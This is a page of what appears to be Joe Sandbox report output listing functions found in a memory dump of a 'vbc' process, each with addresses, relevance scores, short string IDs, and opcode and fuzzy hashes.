                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: GlobalTags
                            • API String ID: 0-1106856819
                            • Opcode ID: c9983efdc9e49901916c2f08d4520c0ce8b02df969fe02b906109d1dc789a082
                            • Instruction ID: 8b8e9f7047d65f93d7349b0d1b96c2cc3885bdc0cc3ebd989d2c0669b86d756b
                            • Opcode Fuzzy Hash: c9983efdc9e49901916c2f08d4520c0ce8b02df969fe02b906109d1dc789a082
                            • Instruction Fuzzy Hash: 03717C75E0431ADFDF68DF98D590AEDFBB2BF48700F14812AE806A7241EB359941CB60
                            Function 0516973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                            • Instruction ID: 171854ae896a13f01f9cb30808155d02dc449bae642ff4f4babbc9ea223cac08
                            • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                            • Instruction Fuzzy Hash: 2F618C7AD0425DEBDF21DFA9C844BEEBBB9FF80710F114169E821A7290D7759A10CB60
                            Function 0522132D Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $aD
                            • API String ID: 0-45832813
                            • Opcode ID: dc0f4f18af956dddedffa2a96304b42ced0322c08e6bff53d732746fcd4b04fc
                            • Instruction ID: 383045cbed538f7d23972f3ca6a0b3fc2c60417fc970dd6bfbac24e720e45af6
                            • Opcode Fuzzy Hash: dc0f4f18af956dddedffa2a96304b42ced0322c08e6bff53d732746fcd4b04fc
                            • Instruction Fuzzy Hash: 05818E75A10256DFCB09CF68C480AAEBBF1FF48300F1581A9E859EB355D734EA51CBA0
                            Function 051EF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @
                            • API String ID: 0-2766056989
                            • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                            • Instruction ID: f429f34f7deeeb1d54425c1c90be75b0ba934f0ba324b4ab919ad088072d0c4e
                            • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                            • Instruction Fuzzy Hash: 1351C076608B45BFE722DF14C844F6BB7E8FB84750F010929B98097291E770ED45CB92
                            Function 0517E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: EXT-
                            • API String ID: 0-1948896318
                            • Opcode ID: 31809313191e53be58271d896f367c3a19e4de00714b5bbb25418234bc4f0722
                            • Instruction ID: 4c296b41cca72eee71be486a491109cc3e7e4e6d42198fa88b211480dea5fb4d
                            • Opcode Fuzzy Hash: 31809313191e53be58271d896f367c3a19e4de00714b5bbb25418234bc4f0722
                            • Instruction Fuzzy Hash: 8541B072608309ABD721EA78C844B6BB7FCEF88714F050AADF985D7180E774D904C796
                            Function 051DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: BinaryHash
                            • API String ID: 0-2202222882
                            • Opcode ID: efbd279056847e4649057dea1b679ee9eb52781085e77eaf7fe67e45b1e526f1
                            • Instruction ID: f97d5f34b05e8a7ac8a764798faca84e3a499f295c50b26f2d93939b9475508f
                            • Opcode Fuzzy Hash: efbd279056847e4649057dea1b679ee9eb52781085e77eaf7fe67e45b1e526f1
                            • Instruction Fuzzy Hash: 6D4121B6D0062CAADF219A60CC84FDEB77CAB45758F0045A5E618AB141DB709E89CFA4
                            Function 051E97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: verifier.dll
                            • API String ID: 0-3265496382
                            • Opcode ID: e8575167ad45066d8f204d7c64c58fd6d9fbc704904362a4f1a5a65a04cd6426
                            • Instruction ID: 5c69df5e91b037ecf218f3396381a3fbd15ca89a359e1c1682e52356e1d603eb
                            • Opcode Fuzzy Hash: e8575167ad45066d8f204d7c64c58fd6d9fbc704904362a4f1a5a65a04cd6426
                            • Instruction Fuzzy Hash: A031B271714705AFDB249F28A861F36B7E6FB88710F95803AE945DF391EB718C808790
                            Function 0520705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: kLsE
                            • API String ID: 0-3058123920
                            • Opcode ID: 17eb4c562f65fc594910e7b239aa69e513c17584772039350d95eded3f231475
                            • Instruction ID: 1e4eabbdba4489f0e6f1d4e85fe4bb343b651d23a213535a2718e6bb471604bc
                            • Opcode Fuzzy Hash: 17eb4c562f65fc594910e7b239aa69e513c17584772039350d95eded3f231475
                            • Instruction Fuzzy Hash: 1341257263235256E721AB64F88EB6ABF94FF40724F581618FC658A0C2CFB46485C791
                            Function 05197505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: #
                            • API String ID: 0-1885708031
                            • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                            • Instruction ID: 3ed1bc82d868d80a6b0269e4c09b6b6393c75c7a0c864b4919607b7866e82b01
                            • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                            • Instruction Fuzzy Hash: 3041D075A00216EBDF69DF48C490BBEB7B6FF85301F01405AE802A7280DB70D941CBE1
                            Function 051936EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Flst
                            • API String ID: 0-2374792617
                            • Opcode ID: e88f5c475ea5f31803daa0fc343103422e6a040ae87dbf75193935416427e774
                            • Instruction ID: df30414b67a0feaecaecbd066b7fe38ecd2052a8e36fee45e43ca1d348831862
                            • Opcode Fuzzy Hash: e88f5c475ea5f31803daa0fc343103422e6a040ae87dbf75193935416427e774
                            • Instruction Fuzzy Hash: 8141ADB92053019FC729DF18C484A26FBE5FB49710F15896EE46A8F241DB71D942CBA1
                            Function 05159730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: L4_wL4_w
                            • API String ID: 0-4042522810
                            • Opcode ID: 89ac8d9c8e6d799066e60259e24a146c1e2e357ae56a25ce97f468b6eac42fe1
                            • Instruction ID: 53636bd7b8dc09b6710afa735e74309ca992493fb16e6aeab24d19d50f257e48
                            • Opcode Fuzzy Hash: 89ac8d9c8e6d799066e60259e24a146c1e2e357ae56a25ce97f468b6eac42fe1
                            • Instruction Fuzzy Hash: F4218676604718DFD322EF688804B5ABBB5FF84B70F160829E9659B741DB70ED01CB91
                            Function 05165096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Actx
                            • API String ID: 0-89312691
                            • Opcode ID: 1dcc817ca9103a1e172fe8e75a341f3d39f8461afaa4455d2386e770b3e932c7
                            • Instruction ID: 918d8e8005186fd75882ff398ece3f240bc2acc4e3151cd0e8324f6ce40a7a3d
                            • Opcode Fuzzy Hash: 1dcc817ca9103a1e172fe8e75a341f3d39f8461afaa4455d2386e770b3e932c7
                            • Instruction Fuzzy Hash: FC11B631308602DBDB3C8A1D885463AB797FB95264FB7852AE492CB391EB71DC61C380
                            Function 051E106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrCreateEnclave
                            • API String ID: 0-3262589265
                            • Opcode ID: 07378dd1e96843496c671b698f1fec6dbbc2a6083d6d333beaf797e76c754221
                            • Instruction ID: fe6fb6cbf7469a53a094ba234c71f42e1242c18baeb1874488da7afd093b1c6d
                            • Opcode Fuzzy Hash: 07378dd1e96843496c671b698f1fec6dbbc2a6083d6d333beaf797e76c754221
                            • Instruction Fuzzy Hash: 3F2125B1658344ABC310DF2A8849A5BFBE8FBD5B50F400A1EB99096250DBB09944CB92
                            Function 0520A118 Relevance: .6, Instructions: 591COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8836d053d4be4c0584c8230a3ed12caf71209c74a890719b7f9214138acf3395
                            • Instruction ID: 121c17a57874ddb7a967f6c97fbabb571e8abfb9e4ebdbaa0fb684b4d0f90635
                            • Opcode Fuzzy Hash: 8836d053d4be4c0584c8230a3ed12caf71209c74a890719b7f9214138acf3395
                            • Instruction Fuzzy Hash: 3822BB7463A7528BDB24CF29C094776B7F2BF44300F889559E88A8B6C7D375E482CB60
                            Function 052216CC Relevance: .6, Instructions: 571COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9234454ea5a902b1d02113f751ddec6179762d981caa9805f7eea6f252b1c670
                            • Instruction ID: a4e35d2a7316c176e58c227532b2341e3f8cf1d855bebfaeaf7329b399ff574d
                            • Opcode Fuzzy Hash: 9234454ea5a902b1d02113f751ddec6179762d981caa9805f7eea6f252b1c670
                            • Instruction Fuzzy Hash: 5722A039B102269FCB19CF58C490EBEB7B2BF88314B24856DD45ADB345DB30E952CB90
                            Function 051665D0 Relevance: .4, Instructions: 383COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07f4a453c5b564f6ac3995aa6f2b1f64efde68688a787011590b171c0d03493e
                            • Instruction ID: 509480013aaec288b1127cefb09d0afabcf408050a8b2f432b15bdf51ae236f8
                            • Opcode Fuzzy Hash: 07f4a453c5b564f6ac3995aa6f2b1f64efde68688a787011590b171c0d03493e
                            • Instruction Fuzzy Hash: 1FE1AD71608342DFC714DF28C490A6ABBF2FF89314F158A6DE8998B351DB31E915CB92
                            Function 0516D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2b2e2c85634f74884e8274fc915fa4844900f5161ea9437b7ed72f60ba39f047
                            • Instruction ID: f30f315a302da96daf8fa0f876e27c0f9147bcc5284dedceea2157e96319dfb9
                            • Opcode Fuzzy Hash: 2b2e2c85634f74884e8274fc915fa4844900f5161ea9437b7ed72f60ba39f047
                            • Instruction Fuzzy Hash: D5C1E371F082059BDF28CF58C855BAEBBB6FF54310F1982ADD855AB280D7B1E951CB80
                            Function 0517F460 Relevance: .3, Instructions: 321COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43334bcad2c648f9bebed3e502a8ddfdfd1bd1f28bbf62a98853d8559bf11755
                            • Instruction ID: 499eb7148d5165646c8f6f1bfabc0b43d565d7983a96296ed445f5b547409c60
                            • Opcode Fuzzy Hash: 43334bcad2c648f9bebed3e502a8ddfdfd1bd1f28bbf62a98853d8559bf11755
                            • Instruction Fuzzy Hash: 99C10571A04229CBDB28CF1CC4D8BBAB7B2FF44714F1A4159E9429F3A1E7749A42CB54
                            Function 05170535 Relevance: .3, Instructions: 300COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                            • Instruction ID: 2899f11d9766e660bd5531ceef4720fd288553e9f094e945f01bc95319cee50c
                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                            • Instruction Fuzzy Hash: AEB11431708749EFDB25DB68C858BBEBBF6BF48200F150199E552DB281D735E941CB90
                            Function 051890DB Relevance: .3, Instructions: 287COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56a57a32cafe5a413272d0058e28fd58b9c260b6740697252c1c1ffe31cad284
                            • Instruction ID: 9fd4ac69195a32ebde34ac16616aadeb70f2c2164ce34413e0e72963611fc4d3
                            • Opcode Fuzzy Hash: 56a57a32cafe5a413272d0058e28fd58b9c260b6740697252c1c1ffe31cad284
                            • Instruction Fuzzy Hash: E2A15072A04255AFEB23EF64CC45FBE7BBAAF45750F010468F910AB2A0D7759D50CBA0
                            Function 0515C427 Relevance: .3, Instructions: 280COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64dbecedac6435614882772a8e0eaffe34bb3cfc13a32f85010c0f06bb4e6304
                            • Instruction ID: 15ee47f79b7e14a870c91e8ef007c9cb33beb6820b3ba49d6c3682df1d213aa1
                            • Opcode Fuzzy Hash: 64dbecedac6435614882772a8e0eaffe34bb3cfc13a32f85010c0f06bb4e6304
                            • Instruction Fuzzy Hash: F4B17070B14265CBDB35DF64C894BA9B3B2EF44714F0085E9D91AEB241EB709E86CF60
                            Function 0518E5E7 Relevance: .3, Instructions: 278COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f73fcd10652cf9b676077bd8dff870e2f521e118b19cf09ea25c75261d2dedb2
                            • Instruction ID: f70478162146c14bac4455857a180f648780a3f5f6839579e152e58809a348a8
                            • Opcode Fuzzy Hash: f73fcd10652cf9b676077bd8dff870e2f521e118b19cf09ea25c75261d2dedb2
                            • Instruction Fuzzy Hash: 69A1F031F04658ABDB31EB98C848FBEBBAABF00714F150269E911AB291D7749D41CBD1
                            Function 051A0185 Relevance: .3, Instructions: 276COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a88324936536ff8ec3b095d04caac88b52e29e8dac93b499f38d8b68e1fa1522
                            • Instruction ID: cdfd607719b462c904fcb02cc7a967b313b6309c87b505346b4d5e6dbb069f39
                            • Opcode Fuzzy Hash: a88324936536ff8ec3b095d04caac88b52e29e8dac93b499f38d8b68e1fa1522
                            • Instruction Fuzzy Hash: CDA1D376B007159FDB25DF65C998BBAB7B2FF48314F044029EA0697281EB34E811CB90
                            Function 05234500 Relevance: .3, Instructions: 275COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a1086a09ce43ed501bf06db15d0a4f59a559af2942395795b1021174b840622
                            • Instruction ID: cf5ff6928783ad3a1424085ce8a670c3a91c5138ac7295cb7ed527786ee8f4fa
                            • Opcode Fuzzy Hash: 7a1086a09ce43ed501bf06db15d0a4f59a559af2942395795b1021174b840622
                            • Instruction Fuzzy Hash: 06A1D1B2A242029FCB11EF18C989F6ABBEAFF48704F410968F5499B651D774ED01CBD1
                            Function 05169486 Relevance: .3, Instructions: 259COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d93351f2021faeca08afa41764deb24993592ee2f9a97e3a50e0324f333ab59e
                            • Instruction ID: 93f0b14626316464ded386d03aaad0f5b8b6b7e132ae5d572bd397e3c3e3c48a
                            • Opcode Fuzzy Hash: d93351f2021faeca08afa41764deb24993592ee2f9a97e3a50e0324f333ab59e
                            • Instruction Fuzzy Hash: 96B16E74A04345CFCF28DF28D485BA9BBB1BF08314F64459FE8269B291DB35D892CB90
                            Function 05161131 Relevance: .3, Instructions: 259COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecb4187bb9892e0246f173bd00a4a490d43e8d63cad73572ead651b000604c62
                            • Instruction ID: f12163d7029eb4251e7f38677dfa39f8591757c415da23f1fec69f4dd393b68d
                            • Opcode Fuzzy Hash: ecb4187bb9892e0246f173bd00a4a490d43e8d63cad73572ead651b000604c62
                            • Instruction Fuzzy Hash: 4DB1F3756093409FD364CF28C980A5AFBF1BB88304F18496EF89AD7352D771E946CB52
                            Function 0521B52F Relevance: .2, Instructions: 222COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                            • Instruction ID: 3e79082604dbaec05651db9fc9f9fc465aa995b4cf9d5415344535c28a740eff
                            • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                            • Instruction Fuzzy Hash: 1871C436A2421A9BCF20CF65C580ABFB7FABF24740F55412AEC45AB241E334D942CB94
                            Function 0518D090 Relevance: .2, Instructions: 217COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                            • Instruction ID: fb6aaf0127c349adb91d9a754378ac5fb0fa831214d98c9310a7d49f36d2f1dc
                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                            • Instruction Fuzzy Hash: AA81AE76E042159BDF29DF58C8847BDBBB6FF94340F1582AEC816A7340D732A940CB91
                            Function 0517C640 Relevance: .2, Instructions: 206COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a8d2fe692a8ebd0f5170bd462011a2e75707da887d99af041e17145b8041c53
                            • Instruction ID: abf55dd580dc92d195287d651e063bd22565c21cd2955c75325b8118d4a3ee60
                            • Opcode Fuzzy Hash: 2a8d2fe692a8ebd0f5170bd462011a2e75707da887d99af041e17145b8041c53
                            • Instruction Fuzzy Hash: 8C71BE75D04269EBCB25DF58D490BBEBBB2FF58714F15419EE842AB390DB319800CBA0
                            Function 0517260B Relevance: .2, Instructions: 201COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42a1f1aed5b2ed4b33a74046a8ac40df825a79990712ea7727f53b52186a9105
                            • Instruction ID: 37daf0850162976208c902b8d63d394944a3182ff14127cf0fc3da91329c79a7
                            • Opcode Fuzzy Hash: 42a1f1aed5b2ed4b33a74046a8ac40df825a79990712ea7727f53b52186a9105
                            • Instruction Fuzzy Hash: E271B0797042458FC325DF2CC484B6AB7F6FF84310F0585AAE8A98B352DB34D946CB95
                            Function 051E035C Relevance: .2, Instructions: 198COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                            • Instruction ID: b2c8cb1be8e3323591a724f487194886a0343f8f4f3bc61c1ddda42e2c950c4f
                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                            • Instruction Fuzzy Hash: 6B716D71A00609EFDB11DFA9C988ADEBBB9FF48300F104969E505E7251DB70EE42CB90
                            Function 0522903E Relevance: .2, Instructions: 186COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c36548f51593ebfe2901abcb4509a7cb9010a7e749b86204ca8cdf1b814fa7fd
                            • Instruction ID: 1498fed4681af14184ba33cdc8a75a8e99cffd0a631f689402b6104b7f0e58fd
                            • Opcode Fuzzy Hash: c36548f51593ebfe2901abcb4509a7cb9010a7e749b86204ca8cdf1b814fa7fd
                            • Instruction Fuzzy Hash: B661D279324726BFD715CF69C888BABBBA9FF48310F004619F85997240DB70E984CB91
                            Function 05167703 Relevance: .2, Instructions: 179COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 536c05daae9beb4b5a0cd253412d9069ba25f856711e8d64d9164e3cacc52bbd
                            • Instruction ID: 29b425ee4cb41db690d79c93751e726ed86f9646afdb7b1d8afa7abd601ea29e
                            • Opcode Fuzzy Hash: 536c05daae9beb4b5a0cd253412d9069ba25f856711e8d64d9164e3cacc52bbd
                            • Instruction Fuzzy Hash: 5A613F75B04605AFDB18DF78C484AADFBB6FF88214F24826AD419A7341DB30AD55CBD0
                            Function 0519B570 Relevance: .2, Instructions: 161COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bca2360e958f0e3b639d9321d80df46e32b4de629da33b208237a17bd4b311a8
                            • Instruction ID: 33783dd777db171599c2f6f5f9e1adb9cfc3a19ca9d984235487869a51f6adee
                            • Opcode Fuzzy Hash: bca2360e958f0e3b639d9321d80df46e32b4de629da33b208237a17bd4b311a8
                            • Instruction Fuzzy Hash: C051BEB5604340ABD721FF24D889F6BB7A8EF85724F10062DF911971D2DB34E841CBA2
                            Function 051DD5D0 Relevance: .2, Instructions: 161COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
